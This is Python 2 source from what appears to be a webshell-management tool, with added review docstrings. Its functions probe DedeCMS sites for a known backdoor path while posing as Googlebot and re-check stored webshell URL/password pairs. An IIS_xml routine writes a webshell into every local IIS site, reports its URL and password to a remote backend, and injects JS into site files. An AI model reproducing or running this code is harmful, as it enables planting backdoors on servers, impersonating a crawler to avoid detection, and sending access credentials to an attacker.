def find(self, arg):
    """Probe host *arg* for ``/plus/dst.php`` and queue a finding when it answers as a webshell.

    A GET for ``/plus/dst.php`` is sent with a Googlebot User-Agent. On HTTP
    200 the URL is handed to ``yijuhua.yijuhua_cs`` with the fixed password
    "cmd". A truthy result is recorded on ``Class_Queue.exp_url`` under the
    label "exp_dedecms_yijuhua".

    Returns False when an exception is raised; otherwise falls off the end
    and returns None.

    NOTE(review): the listing was flattened onto one line; the nesting below
    is reconstructed, and the placement of ``return False`` inside the
    ``except`` body is inferred -- confirm against the original file.

    For defenders: the probe is a plain GET for ``/plus/dst.php`` carrying a
    Googlebot User-Agent. Requests for that path with that agent string from
    addresses outside Google's crawler ranges are a usable detection signal.
    """
    site = '/plus/dst.php'
    # Request headers; the User-Agent impersonates Googlebot.
    heareds = {
        "User-Agent":
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    }
    # NOTE(review): the connection is never closed in the visible code.
    conn = httplib.HTTPConnection(arg)
    try:
        conn.request('GET', site, None, heareds)
        httpres = conn.getresponse()
        if httpres.status == 200:
            data = 'http://%s/plus/dst.php' % arg
            # Arguments per the original comment: "asp"/"php", URL, password.
            # presumably returns truthy when the URL behaves as a one-line
            # webshell for that password -- helper is not shown here.
            if yijuhua.yijuhua_cs("php", data, "cmd"):
                # Positive result.
                # Fields: [site, finding type, finding detail, affected URL,
                #          password, note]
                EXP_list = [
                    self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
                    "webshell"
                ]
                #print EXP_list
                # Enqueue the finding.
                # NOTE(review): if exp_url is a Queue.Queue, 0.5 is passed
                # positionally as `block`, not as `timeout` -- confirm intent.
                Class_Queue.exp_url.put(EXP_list, 0.5)
    except Exception, e:
        # Every error (connect, read, helper failure) is swallowed silently.
        #print e
        return False
def yjh_cs_2(self):
    """Re-test the entries selected in ``SQLite_tableView`` and record the result.

    For every selected row, column 0 (URL) and column 1 (password) are read.
    Rows whose URL is empty or at most 7 characters long are marked 'null'.
    All other rows are passed to ``yijuhua.yijuhua_cs``; the outcome ('ok' or
    'No') is written to the table view and to the ``shell`` table.
    The module-level counters ``yu_2`` (successes) and ``yu_3`` (failures)
    are incremented. Always returns 0.

    NOTE(review): the listing was flattened; the nesting below is
    reconstructed. In particular the final ``mysqlite3_update`` is placed
    after the if/else, and the button re-enable after the loop -- confirm.

    NOTE(review): every UPDATE statement is built with ``%`` string
    formatting from table-cell values. A quote character in a stored URL or
    password changes the statement; the visible helper only accepts a
    finished SQL string, so this cannot be parameterized from here.
    """
    global yu_2, yu_3
    self.ui.main_pushButton_2.setEnabled(0)  # disable the button while the check runs
    int_model = self.ui.SQLite_tableView.selectionModel()  # selection model of the view
    model = self.ui.SQLite_tableView.model()
    #index = model.index(3,1)#data = model.data(index)#print data.toString()
    h = qqwry.C_hoset()
    for index in int_model.selectedRows():  # for each selected row
        try:
            int_index = index.row()  # row number
            s0 = model.data(model.index(int_index, 0)).toString()
            s1 = model.data(model.index(int_index, 1)).toString()
            data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                       time.localtime(time.time()))
            data_time = time.mktime(
                time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  # convert to a Unix timestamp
            if s0 == "" or len(s0) <= 7:
                yu_3 += 1  # failure counter
                self.tableView_add(int_index, None, None, u"null", None, None,
                                   None, None, None, None,
                                   data_time2)  # update the row in the view
                sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    data_time, str(s0), str(s1))
                self.sql3.mysqlite3_update(sql_data)
                continue  # skip to the next row
            # Arguments: "asp"/"php" (from g.bool_asp_php), URL, password.
            if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                yu_2 += 1  # success counter
                # Per the original comment: URL, password -> operating system.
                win_linux = yijuhua.yijuhua_win_linux(
                    str(s0), str(s1))
                # presumably a location lookup for the host (qqwry) -- helper not shown
                WLWZ = h.www_data(qqwry.url_www(str(s0)))
                WLWZ = u"%s" % (WLWZ)
                # ASP entries are recorded as Windows regardless of the probe result.
                if g.bool_asp_php(str(s0)) == "asp":
                    win_linux = "WinNT"
                self.tableView_add(int_index, None, None, u"ok",
                                   str(win_linux), None, None, None, WLWZ,
                                   None, data_time2)  # update the row in the view
                sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    str(win_linux), WLWZ, data_time, str(s0), str(s1))
            else:
                yu_3 += 1  # failure counter
                self.tableView_add(int_index, None, None, u"No", u"No", None,
                                   None, None, None, None,
                                   data_time2)  # update the row in the view
                sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    data_time, str(s0), str(s1))
            self.sql3.mysqlite3_update(sql_data)
        except BaseException, e:
            # NOTE(review): BaseException also catches KeyboardInterrupt and
            # SystemExit; the row is skipped and only the message is printed.
            print(str(e))
    self.ui.main_pushButton_2.setEnabled(1)  # re-enable the button
    return 0
def db_cs(self, ID):
    """Re-test entries of the ``shell`` table selected by status and store the result.

    ``ID`` selects the rows: 0 -> ``zts3 is null`` (never tested),
    1 -> ``zts3='ok'``, 2 -> ``zts3='No'``. Any other value leaves the query
    string empty. For each row, column 0 (URL) and column 1 (password) are
    tested with ``yijuhua.yijuhua_cs`` and the row is updated to 'ok', 'No'
    or 'null'. The module-level counters ``yu_2`` and ``yu_3`` are
    incremented. Returns 0.

    NOTE(review): the listing was flattened; the nesting below is
    reconstructed. The placement of the final ``mysqlite3_update`` (after
    the if/else) and of ``return 0`` (after the try/except) is inferred.

    NOTE(review): the UPDATE statements are built with ``%`` formatting from
    values read back out of the database, so a quote character in a stored
    URL or password alters the statement. URL and password are also printed
    to stdout in clear text.
    """
    try:
        global yu_1, yu_2, yu_3
        sql_data = ""
        if ID == 0:
            sql_data = "select * from shell where zts3 is null"
        if ID == 1:
            sql_data = "select * from shell where zts3='ok'"
        if ID == 2:
            sql_data = "select * from shell where zts3='No'"
        self.sql3.conn.commit()
        # Obtain a cursor object.
        cur = self.sql3.conn.cursor()
        # Run the query through the cursor.
        cur.execute(sql_data)
        # Fetch all results.
        res = cur.fetchall()
        # Walk every returned record.
        for line in res:
            s0 = str(line[0])
            s1 = str(line[1])
            data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                       time.localtime(time.time()))
            data_time = time.mktime(
                time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  # convert to a Unix timestamp
            if s0 == "" or len(s0) <= 7:
                yu_3 += 1  # failure counter
                sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    data_time, str(s0), str(s1))
                self.sql3.mysqlite3_update(sql_data)
                continue  # skip to the next record
            # Arguments: "asp"/"php" (from g.bool_asp_php), URL, password.
            if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                yu_2 += 1  # success counter
                # Per the original comment: URL, password -> operating system.
                win_linux = yijuhua.yijuhua_win_linux(
                    str(s0), str(s1))
                # presumably a location lookup for the host (qqwry) -- helper not shown
                WLWZ = self.h.www_data(qqwry.url_www(str(s0)))
                WLWZ = u"%s" % (WLWZ)
                # ASP entries are recorded as Windows regardless of the probe result.
                if g.bool_asp_php(str(s0)) == "asp":
                    win_linux = "WinNT"
                sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    str(win_linux), WLWZ, data_time, str(s0), str(s1))
                # Per the original comment: fetch Baidu / Google / Sogou ranking.
                self.br_pr_sogo(s0, s1)
                print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0), str(s1),
                                                             WLWZ)
                self.messagebox()
            else:
                yu_3 += 1  # failure counter
                sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                    data_time, str(s0), str(s1))
                self.messagebox()
                print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1))
            self.sql3.mysqlite3_update(sql_data)
    except BaseException, e:
        # NOTE(review): one failing record aborts the whole run, because the
        # try wraps the loop; BaseException also catches KeyboardInterrupt.
        print(str(e))
    return 0
def scan(self, url): self.look_add_file() #添加数据 for i in self.list: # ss = i.split("|") if len(ss) >= 2: url2 = url + ss[0] if yijuhua.yijuhua_cs(self.bool_asp_php(url2), url2, str(ss[1])): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ self.url, "exp", "exp_eval", url2, str(ss[1]), "webshell" ] ##["网址","漏洞类型","漏洞详细信息","漏洞地址","密码","备注"] #print EXP_list Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
def br_pr_sogo_4(self):
    """Query the webshell status of the rows selected in ``tableView``.

    For every selected row, column 0 (URL) and column 1 (password) are read.
    Rows whose URL is empty or at most 7 characters long are marked 'null'.
    All other rows are tested with ``yijuhua.yijuhua_cs``. On success the
    operating system and the value returned by ``yijuhua.www_wlwz`` are
    written to the view and to the ``url`` table; on failure the row is
    marked 'No'. Returns None.

    NOTE(review): the listing was flattened; the nesting below is
    reconstructed. The final ``mysqlite3_update`` is placed after the
    if/else -- confirm.

    NOTE(review): ``pb_pushButton_1`` is disabled at the top and is not
    re-enabled anywhere in the visible code.

    NOTE(review): the UPDATE statements are built with ``%`` formatting.
    Only ``www_wlwz`` is URL-quoted; the URL and password cell values are
    interpolated as-is, so a quote character in either alters the statement.
    """
    self.ui.pb_pushButton_1.setEnabled(0)  # disable the button
    int_model = self.ui.tableView.selectionModel()  # selection model of the view
    model = self.ui.tableView.model()
    #index = model.index(3,1)#data = model.data(index)#print data.toString()
    for index in int_model.selectedRows():  # for each selected row
        try:
            int_index = index.row()  # row number
            s0 = model.data(model.index(int_index, 0)).toString()
            s1 = model.data(model.index(int_index, 1)).toString()
            if s0 == "" or len(s0) <= 7:
                self.tableView_add(int_index, None, None,
                                   u"null")  # update the row in the view
                sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                    str(s0), str(s1))
                self.sql3.mysqlite3_update(sql_data)
                continue  # skip to the next row
            #print str(s0)
            # Arguments: "asp"/"php" (from g.bool_asp_php), URL, password.
            if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                # Default to Windows; only PHP entries are probed for the OS.
                win_linux = "WinNT"
                if g.bool_asp_php(s0) == "php":
                    win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1))
                www_wlwz = yijuhua.www_wlwz(str(s0))
                self.tableView_add(int_index, None, None, u"ok",
                                   str(win_linux), None, None,
                                   www_wlwz)  # update the row in the view
                sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % (
                    str(win_linux), urllib.quote(
                        str(www_wlwz)), str(s0), str(s1))
            else:
                self.tableView_add(int_index, None, None,
                                   u"No")  # update the row in the view
                sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                    str(s0), str(s1))
            #print sql_data
            self.sql3.mysqlite3_update(sql_data)
        except BaseException, e:
            # NOTE(review): every error, including KeyboardInterrupt, is
            # dropped without any trace; the row is left unchanged.
            pass
def br_pr_sogo_4(self):
    """Query the webshell status of the rows selected in ``tableView``.

    For every selected row, column 0 (URL) and column 1 (password) are read.
    Rows whose URL is empty or at most 7 characters long are marked 'null'.
    All other rows are tested with ``yijuhua.yijuhua_cs`` and marked 'ok' or
    'No' in both the view and the ``url`` table. Returns None.

    NOTE(review): the listing was flattened; the nesting below is
    reconstructed. The final ``mysqlite3_update`` is placed after the
    if/else -- confirm.

    NOTE(review): ``pushButton_4`` is disabled at the top and is not
    re-enabled anywhere in the visible code.

    NOTE(review): the UPDATE statements are built with ``%`` formatting from
    table-cell values, so a quote character in a stored URL or password
    alters the statement.
    """
    self.ui.pushButton_4.setEnabled(0)  # disable the button
    int_model = self.ui.tableView.selectionModel()  # selection model of the view
    model = self.ui.tableView.model()
    #index = model.index(3,1)#data = model.data(index)#print data.toString()
    for index in int_model.selectedRows():  # for each selected row
        try:
            int_index = index.row()  # row number
            s0 = model.data(model.index(int_index, 0)).toString()
            s1 = model.data(model.index(int_index, 1)).toString()
            if s0 == "" or len(s0) <= 7:
                self.tableView_add(int_index, None, None,
                                   u"null")  # update the row in the view
                sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                    str(s0), str(s1))
                self.sql3.mysqlite3_update(sql_data)
                continue  # skip to the next row
            #print str(s0)
            # Arguments: "asp"/"php" (from g.bool_asp_php), URL, password.
            if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                self.tableView_add(int_index, None, None,
                                   u"ok")  # update the row in the view
                sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % (
                    str(s0), str(s1))
            else:
                self.tableView_add(int_index, None, None,
                                   u"No")  # update the row in the view
                sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                    str(s0), str(s1))
            #print sql_data
            self.sql3.mysqlite3_update(sql_data)
        except BaseException, e:
            # NOTE(review): every error, including KeyboardInterrupt, is
            # dropped without any trace; the row is left unchanged.
            pass
def IIS_xml():
    """Walk the sites in the local IIS configuration and write a script file into each web root.

    The text returned by ``open_file()`` is searched for
    ``<IIsWebVirtualDir ... </IIsWebServer>`` sections. For each section
    that carries both a ``ServerBindings`` and a ``Path`` attribute:

    * a file name is built from a directory chosen out of
      ``list_file(download_Path)``, the result of ``sj_az_AZ(8)`` and the
      ``ASP_PHP`` extension;
    * ``path_file`` writes ``argv1`` to that file;
    * each URL derived from the binding is tested with
      ``yijuhua.yijuhua_cs`` and the result is appended to
      "webshell--OK.txt" or "webshell--NO.txt";
    * on success, when ``argv3`` is non-empty, the URL and password are sent
      to it through ``yijuhua.Aurl_post``;
    * ``list_file_js(download_Path)`` is called (the original comment says
      it walks the path and attaches JS);
    * the written file is removed again if no URL tested positive.

    Returns 0 when the configuration cannot be read or when any exception
    is raised inside the loop; otherwise returns None.

    ``argv1``, ``argv2``, ``argv3`` and ``ASP_PHP`` are module-level names
    defined outside this listing.

    NOTE(review): the listing was flattened; the nesting below is
    reconstructed. The placement of the separator ``print``, of
    ``list_file_js`` and of the clean-up block relative to the inner loop is
    inferred -- confirm against the original file.

    For defenders: the on-host artefacts visible here are the result logs
    "webshell--OK.txt" / "webshell--NO.txt" in the working directory, a
    newly created script with a generated name inside an existing
    subdirectory of an IIS site, and an outbound request whose query string
    carries ``url=`` and ``passwod=`` parameters. File-integrity monitoring
    on web roots and egress logging cover all three.
    """
    data = open_file()
    if data == 0:
        print u"Cannot find the file path in the C IIsWebServerfile"  # IIS configuration file not found
        return 0
    p1 = re.compile(r'<IIsWebVirtualDir(.+?)</IIsWebServer>')
    data1 = data.replace("\n", '')  # strip newlines so the pattern can match across lines
    IISWEB = p1.findall(data1)  # one entry per site section
    for every1 in IISWEB:  # for each site section
        try:
            p2 = re.compile(r'ServerBindings="(.+?)"')
            data2 = p2.findall(every1)  # site bindings (host names)
            if len(data2) < 1:
                continue  # skip this section
            p3 = re.compile(r'Path="(.+?)"')
            data3 = p3.findall(every1)  # site path
            if len(data3) < 1:
                continue  # skip this section
            download_Path = TQ_Path(data3[0])  # site root directory
            data_list = list_file(download_Path)  # walk the directory tree
            if len(data_list) >= 1:
                # Target file: <chosen directory><generated name>.<ASP_PHP>
                # Example from the original comment: D:\wamp\www\CPM\Index\Lib\Action\
                data_url2 = "%s%s.%s" % (
                    data_list[sjs_random(0, len(data_list))], sj_az_AZ(8),
                    ASP_PHP)
            else:
                continue  # skip this section
            www_bool = False  # becomes True once any URL tests positive
            for www_url in http_www_url(data2[0]):
                print "www:%s" % (www_url)  # URL, e.g. http://localhost/
                print "download_Path:%s" % (download_Path)  # site root, e.g. D:\wamp\www
                # File path, e.g. D:\wamp\www\mythink\.svn\pristine\4b\vuZelUL.php
                print "download_Path eval:%s" % (
                    data_url2
                )
                # Build the URL that maps to the written file,
                # e.g. http://localhost/mythink/.svn/pristine/4b/vuZelUL.php
                www_url2 = "%s%s" % (
                    www_url,
                    download_bz(download_Path, data_url2).replace(
                        "\\", '/')
                )
                print "www_Path:%s" % (www_url2)  # resulting URL
                path_file(data_url2, argv1)  # write file: path, content
                if yijuhua.yijuhua_cs(ASP_PHP, str(www_url2), str(argv2)):
                    www_bool = True
                    # NOTE(review): `data` is reused here and no longer holds
                    # the configuration text; data1 was already derived above.
                    data = "%s|%s" % (str(www_url2), str(argv2))
                    TXT_file2("webshell--OK.txt", data)
                    print "file:%s" % (data_url2)
                    print "url:%s password:%s--OK" % (str(www_url2),
                                                      str(argv2))
                    if not argv3 == "":
                        data_url = "%s?url=%s&passwod=%s" % (
                            str(argv3), str(www_url2), str(argv2))
                        yijuhua.Aurl_post(data_url)  # submit to the remote backend
                        print "post %s" % (data_url)
                else:
                    data = "%s|%s" % (str(www_url2), str(argv2))
                    TXT_file2("webshell--NO.txt", data)
                    print "file:%s" % (data_url2)
                    print "url:%s password:%s--NO" % (str(www_url2),
                                                      str(argv2))
                print "----------------------------------------"
            # Per the original comment: walk the path and attach JS.
            list_file_js(download_Path)
            if www_bool == False:
                if os.path.isfile(data_url2):  # check whether the file exists
                    os.remove(data_url2)  # delete the file
                    print "delete %s" % (data_url2)
        except BaseException, e:
            # NOTE(review): the first exception ends the whole run, not just
            # the current section, and nothing is logged.
            #print(str(e))
            return 0